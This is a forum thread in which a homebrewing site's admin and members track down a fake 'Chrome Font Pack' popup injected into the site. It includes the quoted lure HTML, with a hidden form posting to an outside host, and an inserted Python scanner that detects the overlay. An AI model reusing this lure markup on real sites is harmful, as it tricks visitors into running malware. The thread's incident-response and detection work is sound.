Attack / Virus
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Attack / Virus
Hey everyone,
A user has reported something suspicious, and it's an attack directed at Google Chrome users from what I can tell.
If you see any page asking you to install a missing font, DO NOT DO IT.
If anyone sees this popup / error / page, please let me know as I haven't tracked down how the attacker is doing this.
If it's one post or topic, please let me know which. Perhaps it's just something embedded in a post text.
Thanks,
-Rob
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- GAM
- Verified User
- Posts: 5403
- Joined: Wed May 18, 2011 2:50 pm
- Name: Sandy MacNeil
- Location: North End HFX
Re: Attack / Virus
Lots of it going around.
Thanks Rob.
S
- jacinthebox
- Award Winner 16
- Posts: 3047
- Joined: Tue Oct 16, 2012 12:44 pm
- Name: Justin
- Location: Hubley
- Contact:
Re: Attack / Virus
Yeah, it's a fake font install... only an issue for Chrome users.
Brathair Brewing
Brew Hard...Stay Humble
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
I can't reproduce it with Chrome on Linux. Can someone on Windows try? You may need to come from Google search, so searching for "site:brewnosers.org brewing" might lead you to it.
Maybe it's just some specific topics with some embedded image / javascript somehow. I need to find it to kill it.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- jacinthebox
- Award Winner 16
- Posts: 3047
- Joined: Tue Oct 16, 2012 12:44 pm
- Name: Justin
- Location: Hubley
- Contact:
Re: Attack / Virus
I had it on my home PC.
I resolved it by going to settings/advanced settings/reset settings.
It went away.
https://malwaretips.com/blogs/remove-ch ... exe-virus/
Bottom of the page... malware software didn't pick up on anything... maybe because I didn't click install on the virus popup.
Brathair Brewing
Brew Hard...Stay Humble
- LeafMan66_67
- Award Winner 2
- Posts: 4596
- Joined: Fri Mar 02, 2012 7:10 am
- Name: Derek Stapleton
- Location: Lower Sackville, NS
Re: Attack / Virus
Definitely there if you link to the site via a Windows Google Search "site:brewnosers.org brewing". First two forum links give you the attached screen:
"He was a wise man who invented beer." - Plato
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
While on that page, can you view source and see Hoefler anywhere in the text? I can't. But perhaps it's only in the initial load from Google.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- LeafMan66_67
- Award Winner 2
- Posts: 4596
- Joined: Fri Mar 02, 2012 7:10 am
- Name: Derek Stapleton
- Location: Lower Sackville, NS
Re: Attack / Virus
RubberToe wrote: While on that page, can you view source and see Hoefler anywhere in the text? I can't. But perhaps it's only in the initial load from Google.
Can no longer get it to pop up.
"He was a wise man who invented beer." - Plato
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
Odd. If you can get it to happen again please update.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
WordPress was highly suspect so I removed it. It's still puzzling but it was at the top level of the site. Looking through its files there was something fishy as well. WordPress has been a common attack vector for a long time, and we don't maintain ours. Therefore I figure it's a liability so I removed it.
If anyone wants to replace the main web page I'm open to suggestions.
If anyone can reproduce this Chrome font thing I would like to know.
Thanks,
-Rob
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
-
- Award Winner 1
- Posts: 43
- Joined: Fri Jan 13, 2012 4:15 pm
- Name: Mark Power
- Location: Elmsdale, NS
Re: Attack / Virus
Hey Rob,
I can reproduce by doing a Google search for "site:brewnosers.org brewing". Any forum link I click will cause the font thing to open. If I view source it does have Hoefler in the text.
I'm using Windows 10 and Chrome Version 56.0.2924.87.
Code:
<div id="dm-overlay"><div id="dm-table"><div id="dm-cell"><div id="dm-modal"><div id="dm-table"><a href="javascript:void(0)" onclick="document.getElementById('dm-overlay').style.display = 'none'; setTimeout(dy0,1000);" id="cl0se"></a><img id="l0gos" alt='' /><p id="pphh" >The "HoeflerText" font wasn't found.</p></div><div id="odiv9"><p id="info1" >The web page you are trying to load is displayed incorrectly, as it uses the "HoeflerText" font. To fix the error and display the text, you have to update the "Chrome Font Pack".</p><p id="info2" style="display:none;">Step 1: In the bottom left corner of the screen you'll see the download bar. <b id="bbb1">Click on the Chrome_Font.exe</b> item.<br id="brbr1" />Step 2: Press <b id="bbb1">Yes(Run)</b> in order to see the correct content on the web page.</p><div id="divtabl"><table id="tabl1"><tbody id="tbody1"><tr id="trtr1"><td id="tdtd1">Manufacturer:</td><td id="tdtd1">Google Inc. All Rights Reserved</td></tr><tr id="trtr1"><td id="tdtd1">Current version:</td><td id="tdtd1">Chrome Font Pack <b id="bbb2">53.0.2785.89</b></td></tr><tr id="trtr1"><td id="tdtd1">Latest version:</td><td id="tdtd1">Chrome Font Pack <b id="bbb2">57.2.5284.21</b></td></tr></tbody></table><div id="helpimg"><img id="inf0s" alt='' /></div></div><form action="http://www.ibdaa.edu.sa/main.php" method="post" id="form_1d"><input type='hidden' name='infol' value='1ruQABqyXM4ZJccx2UKWo1SbGco0MV3G1PY+pCWlGtqGo1CKYt0=' /></form><div id="upe0" onclick="ue0()" ><a href="javascript:void(0)" id="b00tn">Update</a></div></div></div></div></div><div id="popup-container" class="popup-window gc" style="display:none;"><div class="bigarrow element-animation"></div></div></div>
<script>
-
- Award Winner 1
- Posts: 43
- Joined: Fri Jan 13, 2012 4:15 pm
- Name: Mark Power
- Location: Elmsdale, NS
Re: Attack / Virus
Update: I was able to reproduce this several times in a row before replying, but while checking what version of Chrome I had, it initiated an update. Now it is on Version 57.0.2987.98 and I am no longer able to reproduce it, and the source no longer has the above snippet I posted.
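A check an admin could run over a saved copy of a page's source to look for the overlay quoted in this thread: the marker ids and strings come from that quoted markup, and any form posting to another host is reported. This is an added example, not part of any post here; the function and class names, the sample pages and the `collector.example` host are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Strings and element ids taken from the overlay markup quoted in this thread.
TEXT_MARKERS = ("HoeflerText", "Chrome Font Pack", "Chrome_Font.exe")
ID_MARKERS = ("dm-overlay", "dm-modal")


class OverlayScanner(HTMLParser):
    """Collect element ids, form targets and text from saved page source."""

    def __init__(self):
        super().__init__()
        self.ids, self.form_actions, self.text = set(), [], []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if attrs.get("id"):
            self.ids.add(attrs["id"])
        if tag == "form" and attrs.get("action"):
            self.form_actions.append(attrs["action"])

    def handle_data(self, data):
        self.text.append(data)


def scan_page_source(html, site_host):
    """Return the injected-overlay indicators found in one saved page."""
    scanner = OverlayScanner()
    scanner.feed(html)
    scanner.close()
    text = " ".join(scanner.text)
    # A forum page has no reason to POST a form to another host.
    offsite = [a for a in scanner.form_actions
               if urlparse(a).hostname not in (None, site_host)]
    return {"ids": sorted(i for i in ID_MARKERS if i in scanner.ids),
            "text": [m for m in TEXT_MARKERS if m in text],
            "offsite_forms": offsite}


# Constructed samples (placeholder host, not the one in the post).
CLEAN = '<p>Brewing</p><form action="/ucp.php" method="post"></form>'
INJECTED = ('<p>Brewing</p><div id="dm-overlay"><div id="dm-modal">'
            '<p>The "HoeflerText" font wasn\'t found. Click on the Chrome_Font.exe item.</p>'
            '<form action="http://collector.example/main.php" method="post"></form>'
            '</div></div>')

if __name__ == "__main__":
    print(scan_page_source(INJECTED, "brewnosers.org"))
```

Because the overlay in this thread only showed up on some loads, the source has to be saved from a load where the popup actually appeared; a clean result on a direct visit says nothing about the search-referred page.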
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
Thanks for the info, Mark!
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- jimboh
- Verified User
- Posts: 326
- Joined: Tue Dec 13, 2016 1:46 pm
- Name: jim
- Location: Jeddore NS
Re: Attack / Virus
I used Chrome to access the site for the first time today, had been using Firefox. Got the virus warning. Tried to view source but the popup no longer appears.
Drinking: Best Coast IPA, Old Speckled Hen Clone, Northern Lights (NG),
Belgian Saison, Blonde Ale, Toy Soldier Stout(OBK) and 14G batch of ESB.
Fermenting: Taking a rest!
Scheduled: Another 10G of Toy Soldier Stout.
- jimboh
- Verified User
- Posts: 326
- Joined: Tue Dec 13, 2016 1:46 pm
- Name: jim
- Location: Jeddore NS
Re: Attack / Virus
Hi, I am using a different computer and visited the site using Chrome and got the virus. I saved the source for the whole page if it's any use to you. Let me know if you want me to upload the txt file as an attachment or email it?
I got there by typing brewnosers in search and it was the first.
The Google link is https://www.google.ca/url?sa=t&rct=j&q= ... OVt7nYTYfw
I believe it's cached so it may be a problem you no longer have. Don't know if you can request Google to refetch the page due to this issue.
Drinking: Best Coast IPA, Old Speckled Hen Clone, Northern Lights (NG),
Belgian Saison, Blonde Ale, Toy Soldier Stout(OBK) and 14G batch of ESB.
Fermenting: Taking a rest!
Scheduled: Another 10G of Toy Soldier Stout.
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
Thanks.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- danlatimer
- Verified User
- Posts: 275
- Joined: Sun Apr 26, 2015 9:45 pm
- Name: Daniel N Latimer
Re: Attack / Virus
It just happened to me again.
This is the culprit: https://malwaretips.com/blogs/remove-ch ... exe-virus/
Here's a forum post about server admins talking about trying to get rid of it. They apparently eventually did but they didn't post how they did it :S http://forum.odroid.com/viewtopic.php?t=25568
After 5 minutes or so it stopped happening again. Probably a strategy to prevent it from being fixed.
Here are a few pictures of it happening
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
Thanks, I'm digging again.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
Screw this, I'm installing a fresh copy of phpBB. Here goes... don't worry, I have lots of backups.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
The site has been upgraded. Now I have to fix the style. And new Tapatalk!
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter